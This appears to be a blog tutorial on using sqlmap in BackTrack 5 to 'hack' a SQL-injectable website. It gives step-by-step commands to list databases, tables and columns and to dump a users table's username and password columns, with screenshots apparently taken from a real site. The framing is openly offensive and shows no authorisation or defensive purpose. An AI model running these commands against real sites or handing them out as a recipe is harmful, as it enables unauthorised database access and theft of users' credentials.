SQLmap in BackTrack 5 Tutorial
Hello again guyz
today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5
first of all of all open BackTrack > Terminal; then type:
cd /pentest/database/sqlmap
hit Enter.
Now we are inside SQLmap, lets start hacking
####################################################################
Now the command we will need here is:
+++++++++++++++++++++++++++++++++++++++++
-D <= define the database
-T <= define the table
-C <= define the column
--dbs <= bring Databases names
--tables <= bring table names
--columns <=bring columns names
--dump <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++
###################################################################
Lets start
our first command will be:
./sqlmap.py -u http://www.website.com/index.php?id=13 --dbs <= Example!
it will look like:
![[Image: backtrack1.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGuQTxaVh-fIoSFk4nhhTO-47DRvKBOhP6gMMtlKAKb5Jf0IcRdq60VIPA3IW4V_NyLtk3X0CRlkiNRHSHVVyx3zSIPOcdka_NhCKz3sF1DZYGFcOimWeeCZwU_fHEKrrBz458b72PcOU/s640/backtrack1.PNG)
then we will get the Databases names like:
![[Image: backtrack2.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9iLFAAlg9GQoomnSTh2IKi7YUBcF3g4jv8QjWuCkem2aojNiRSRCtpc1H1jXKzmmy50SQYPCEsfnzEWOzYOZQIC3DHZHjmQDyEOiVvHu6d6bwrw0Q_xrsucqQ-VphZ3ydD3HMZc42Vs/s1600/backtrack2.PNG)
now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables"
so we will type:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name --tables
I choose walnut_live database so I typed:
![[Image: backtrack3.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbiCb7rQ3UCscP2K74AJrvaqRCpqQpOWAmMQGvWxela4PlmjN4kpbC-gL48ydnt20ViFo-zNy6m3yMW6EbkAV6xA454yWGrO5J_2JWHJOWrGwI7z0HrK3ILTLYXc_z723_98hspEXrobg/s640/backtrack3.PNG)
and the results will be the tables name of course
it will look like:
![[Image: backtrack4.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNu96xiVeOaL_f2wZFi-P1w-e3FpZtdYPJkxeoO83X83INuNK3Yt-Aqx8myMWfjAedbE166jzETwXIjBZu1tZDz2TDAarMuto9z4bhE2WSjqv7fmOpZg7f5uneiIJNmeqfoVglRtL3Sds/s1600/backtrack4.PNG)
now we got the tables and found the users table!!
now we will select this table by "-T" command and ofcourse we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --columns
it will look like:
![[Image: backtrack5.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2GAB0cmRbgNNFQltPWED4cgr3TtsS7lY87FsMjfwkcZt4bQSMvI0JsJg2g6F6fFgsEamuWOVTcfMjuwCgaY_-o9_E8PEbBo6gf7_1seYNcgig3ZWRMTwV7a2LgVHHG_nRiSZ1QueP040/s640/backtrack5.PNG)
now we will get the results, the columns
they will come like this:
![[Image: backtrack6.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6IfRwCLyzYLXtzoAkzUmSl58sByCqSVr3se9eLEK3IYSOUyld8rpvRHdoUvYBQ-TBIqv6WksX4W4P4sRl5tiyu7f5I-VxTEnzqKw189SWdzkiC99JRH9DwEpXrRYWPMkQ4XK2_j8bAcU/s1600/backtrack6.PNG)
as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..
first we can get all the data by this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:
![[Image: backtrack7.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmyFL28feLHDe1J1J4H-1cOBhBnaL5I4Fw2QvWgQg-9yP-1Iv0FssQn2vcPQ9I_hyphenhyphenojzXXH6-0ChH22HdXS6-RnpB9fQWmTHa0lEHALyaHirI2bFYWWflJW3lcZstrTqAK5mirhx_W_aA/s640/backtrack7.PNG)
and the result is:
![[Image: backtrack8.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGKPlt1wNv126gyRASPC5qcM2IwnvjtVVOTeK2mqZqidHgAEIdKZ_Fla-a_TwJvSEIv9kNetCWvZtLj7Rm0B7q6W_92arMsGbRV8cnP06k-x8OmyDJMI3JSAgBS-495usl5Lj5ZgiInmY/s640/backtrack8.PNG)
In the picture I marked the user and pass
now we will try getting them one by one with this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
for example I will get user :
User::
![[Image: backtrack9.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihAJ9OfYTRSJA5VoavdMIZFVTYIWVCCzWFZ8FI4FrynKoWPoYglJPrSHyTsjyRMGCFNAM5_up2BZ1ZWpBdiMzDbuO_iHJyw59JyceVB3ajNwxPZLL9HvQ6g0XpZKaAY5fkXLggTIU-nLE/s640/backtrack9.PNG)
result::
![[Image: user.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjKBwSkatodgCl7K3bo52X7NO0wPSaaS2zAvroNLovWHBCGJyFHTelhMayA1i2DO6LQOHCP_PmlLCfh_S3BIoE8Wt5qKCYngSd7b8185zUaBRbZMYXk8-AjAD1YxTK0_osaFxwxxbPktg/s1600/user.PNG)
And so on the for the rest of the data.
No comments:
Post a Comment